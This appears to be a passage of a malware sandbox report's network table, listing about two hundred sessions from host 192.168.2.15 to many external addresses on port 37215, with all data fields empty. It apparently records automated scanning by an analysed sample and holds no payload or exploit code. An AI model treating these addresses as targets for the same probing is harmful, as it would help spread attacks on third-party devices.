                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25792192.168.2.155093041.241.189.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25793192.168.2.154307441.170.115.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25794192.168.2.155289041.49.102.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25795192.168.2.154798841.103.114.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25796192.168.2.154989241.193.109.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25797192.168.2.155894241.33.28.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25798192.168.2.153565041.65.163.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25799192.168.2.154455641.21.225.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25800192.168.2.155290641.212.38.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25801192.168.2.156084441.19.5.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25802192.168.2.153770641.139.8.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25803192.168.2.153514441.23.110.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25804192.168.2.156033641.190.144.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25805192.168.2.154332241.144.175.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25806192.168.2.153652841.195.190.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25807192.168.2.153841641.89.61.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25808192.168.2.154898041.63.16.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25809192.168.2.154048041.231.128.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25810192.168.2.153487041.70.34.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25811192.168.2.155815841.94.45.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25812192.168.2.154790641.202.6.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25813192.168.2.155070641.129.140.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25814192.168.2.153825041.56.100.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25815192.168.2.153933641.68.87.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25816192.168.2.155690241.179.74.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25817192.168.2.155645241.153.19.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25818192.168.2.155600641.136.194.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25819192.168.2.155868641.127.255.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25820192.168.2.154744041.87.146.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25821192.168.2.155854841.177.240.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25822192.168.2.155655041.1.177.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25823192.168.2.155183041.167.247.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25824192.168.2.154040441.179.168.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25825192.168.2.153546441.50.170.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25826192.168.2.154513041.247.78.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25827192.168.2.155554641.23.20.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25828192.168.2.155077841.94.176.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25829192.168.2.154861641.208.106.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25830192.168.2.153357641.97.170.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25831192.168.2.154894841.141.208.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25832192.168.2.154134241.143.138.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25833192.168.2.154998241.104.140.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25834192.168.2.155136841.199.175.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25835192.168.2.154472441.235.163.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25836192.168.2.154732241.204.90.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25837192.168.2.155386841.225.230.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25838192.168.2.155957441.138.40.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25839192.168.2.153764641.171.216.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25840192.168.2.155445441.239.82.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25841192.168.2.153322841.113.248.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25842192.168.2.154941841.122.45.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25843192.168.2.155869441.236.149.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25844192.168.2.155083241.105.48.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25845192.168.2.154848641.192.182.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25846192.168.2.154084041.171.87.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25847192.168.2.154531441.215.73.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25848192.168.2.153731441.186.96.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25849192.168.2.155882041.15.222.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25850192.168.2.155180441.164.121.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25851192.168.2.155973041.125.48.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25852192.168.2.153810441.151.50.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25853192.168.2.155199441.132.248.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25854192.168.2.154220841.127.6.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25855192.168.2.154674441.203.192.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25856192.168.2.155427241.203.182.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25857192.168.2.155438041.2.30.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25858192.168.2.155591641.135.112.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25859192.168.2.154437841.241.142.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25860192.168.2.154453841.214.88.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25861192.168.2.154268241.239.29.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25862192.168.2.155040041.106.177.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25863192.168.2.154333641.147.57.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25864192.168.2.155263641.199.186.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25865192.168.2.155192441.155.175.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25866192.168.2.153394841.226.213.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25867192.168.2.156075241.160.96.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25868192.168.2.155213041.115.255.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25869192.168.2.155197641.187.8.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25870192.168.2.155314841.8.175.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25871192.168.2.153648441.225.62.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25872192.168.2.155504841.214.38.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25873192.168.2.154282441.68.232.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25874192.168.2.154753241.122.120.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25875192.168.2.154029241.105.136.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25876192.168.2.155135441.158.191.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25877192.168.2.154983641.163.17.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25878192.168.2.154298641.82.113.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25879192.168.2.155211041.212.234.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25880192.168.2.153957841.3.117.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25881192.168.2.153433041.58.194.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25882192.168.2.155853241.104.39.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25883192.168.2.155707641.240.185.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25884192.168.2.153966841.248.105.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25885192.168.2.153531041.219.207.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25886192.168.2.154193841.25.176.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25887192.168.2.155337041.56.127.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25888192.168.2.154207041.111.31.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25889192.168.2.154473641.167.13.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25890192.168.2.155239641.240.46.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25891192.168.2.153564041.34.131.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25892192.168.2.153907841.95.220.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25893192.168.2.154505441.242.221.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25894192.168.2.153387841.101.41.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25895192.168.2.155370841.213.43.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25896192.168.2.155658241.157.235.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25897192.168.2.153426641.96.2.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25898192.168.2.154299041.115.133.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25899192.168.2.154903841.100.118.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25900192.168.2.153600241.251.199.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25901192.168.2.153985441.16.102.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25902192.168.2.153488241.15.89.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25903192.168.2.154905241.162.15.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25904192.168.2.153333641.93.216.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25905192.168.2.155661841.47.29.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25906192.168.2.154042241.209.131.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25907192.168.2.154051041.61.1.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25908192.168.2.153604441.218.48.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25909192.168.2.155095241.45.55.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25910192.168.2.154301241.97.143.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25911192.168.2.155655841.86.150.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25912192.168.2.153361841.216.104.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25913192.168.2.154278041.232.85.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25914192.168.2.154333241.155.81.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25915192.168.2.1556608197.185.44.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25916192.168.2.1539000197.233.26.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25917192.168.2.1533758197.81.70.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25918192.168.2.1558156197.9.42.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25919192.168.2.1537712197.41.157.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25920192.168.2.1536926197.133.177.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25921192.168.2.1557556197.9.100.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25922192.168.2.1540156197.149.98.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25923192.168.2.1553624197.27.94.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25924192.168.2.1534014197.246.18.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25925192.168.2.1537238197.21.226.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25926192.168.2.1555358197.225.123.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25927192.168.2.1536550197.168.215.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25928192.168.2.1544216197.147.60.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25929192.168.2.1558582197.55.110.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25930192.168.2.1543538197.103.224.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25931192.168.2.1541360197.133.36.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25932192.168.2.1557390197.47.23.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25933192.168.2.1543016197.186.67.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25934192.168.2.1545014197.205.107.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25935192.168.2.1548170197.139.88.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25936192.168.2.1555624197.178.186.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25937192.168.2.1555230197.200.240.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25938192.168.2.1549998197.229.245.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25939192.168.2.1545622197.48.185.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25940192.168.2.1534516197.6.159.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25941192.168.2.1555340197.179.188.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25942192.168.2.1546944197.156.52.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25943192.168.2.1539778197.1.39.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25944192.168.2.1539934197.10.51.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25945192.168.2.1545558197.38.26.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25946192.168.2.1556084197.224.153.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25947192.168.2.1541118197.194.89.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25948192.168.2.1542774197.15.40.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25949192.168.2.1558844197.25.246.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25950192.168.2.1542580197.103.131.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25951192.168.2.1535550197.53.159.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25952192.168.2.1533612197.60.123.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25953192.168.2.1537704197.165.194.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25954192.168.2.1540030197.32.99.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25955192.168.2.1538280197.210.204.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25956192.168.2.1546758197.100.224.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25957192.168.2.1553204197.114.239.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25958192.168.2.1553292197.123.255.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25959192.168.2.1553776197.170.208.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25960192.168.2.1537138197.115.9.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25961192.168.2.1545940197.37.242.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25962192.168.2.1557160197.148.30.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25963192.168.2.1538056197.59.16.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25964192.168.2.1544084197.83.226.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25965192.168.2.1538230197.250.189.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25966192.168.2.1550056197.150.181.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25967192.168.2.1541750197.98.207.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25968192.168.2.1535534197.229.12.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25969192.168.2.1556428197.31.195.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25970192.168.2.1535398197.117.200.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25971192.168.2.1549788197.194.217.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25972192.168.2.1559054197.120.107.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25973192.168.2.1539324197.214.61.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25974192.168.2.1538056197.237.187.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25975192.168.2.1549042197.181.23.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25976192.168.2.1549382197.120.172.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25977192.168.2.1558070197.154.210.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25978192.168.2.1549814197.82.218.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25979192.168.2.1540960197.15.203.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25980192.168.2.1536858197.175.112.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25981192.168.2.1550832197.136.109.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25982192.168.2.1535808197.133.76.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25983192.168.2.1557922197.241.116.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25984192.168.2.1541082197.37.166.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25985192.168.2.1540820197.40.207.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25986192.168.2.1538660197.170.16.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25987192.168.2.1534992197.221.215.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25988192.168.2.1548748197.109.126.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25989192.168.2.1554516197.78.11.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25990192.168.2.1551052197.208.76.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25991192.168.2.1537150197.90.96.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25992192.168.2.1536124197.163.194.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
